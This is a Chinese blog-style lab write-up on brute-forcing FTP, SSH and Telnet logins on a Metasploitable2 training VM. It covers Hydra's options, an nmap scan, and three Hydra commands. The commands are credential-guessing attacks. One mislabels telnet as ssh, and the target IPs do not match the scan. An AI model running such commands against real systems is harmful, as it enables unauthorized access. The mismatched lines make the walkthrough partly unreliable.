1. 程式人生 > 實用技巧 >記一次metasploitable2內網滲透之21,22,23埠爆破

記一次metasploitable2內網滲透之21,22,23埠爆破

Hydra是一款非常強大的暴力破解工具,它是由著名的黑客組織THC開發的一款開源暴力破解工具。Hydra是一個驗證性質的工具,主要目的是:展示安全研究人員從遠端獲取一個系統認證許可權。

目前該工具支援以下協議的爆破:
AFP,Cisco AAA,Cisco身份驗證,Cisco啟用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS-FORM- GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle Listener,Oracle SID,Oracle,PC-Anywhere, PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP列舉,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth ,VNC和XMPP。

對於 HTTP,POP3,IMAP和SMTP,支援幾種登入機制,如普通和MD5摘要等。

Hydra暴力破解工具的用法_byc6352的專欄-CSDN部落格

hydra常見引數
-R:繼續從上一次進度接著破解
-S:大寫,採用SSL連結
-s  <PORT>:小寫,可通過這個引數指定非預設埠
-l  <LOGIN>:指定破解的使用者,對特定使用者破解
-L  <FILE>:指定使用者名稱字典
-p  <PASS>:小寫,指定密碼破解,少用,一般是採用密碼字典
-P  <FILE>:大寫,指定密碼字典
-e  <ns>:可選選項,n:空密碼試探,s:使用指定使用者和密碼試探
-C <FILE>:使用冒號分割格式,例如“登入名:密碼”來代替 -L/-P 引數 -M <FILE>:指定目標列表檔案一行一條 -o <FILE>:指定結果輸出檔案 -f :在使用-M引數以後,找到第一對登入名或者密碼的時候中止破解 -t <TASKS>:同時執行的執行緒數,預設為16 -w <TIME>:設定最大超時的時間,單位秒,預設是30s -v / -V:顯示詳細過程 server:目標ip service:指定服務名,支援的服務和協議:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http[s]-{head
|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等 OPT:可選項

nmap掃描metasploitable2靶機,發現有21,22,23號埠,在這篇文章就以這三埠進行詳細例項講解

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:11 CST
Nmap scan report for 192.168.43.46
Host is up (0.00032s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login       OpenBSD or Solaris rlogind
514/tcp  open  tcpwrapped
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

通過下列程式碼爆破出ftp登入名和密碼為msfadmin

hydra -L username.txt -P password.txt 192.168.1.1 ftp


通過下列程式碼爆破出ssh登入名和密碼為msfadmin

hydra -l msfadmin -p msfadmin 192.168.1.1 ssh  

通過下列程式碼爆破出telnet登入名和密碼為msfadmin

hydra -l msfadmin -p msfadmin 192.168.1.1 ssh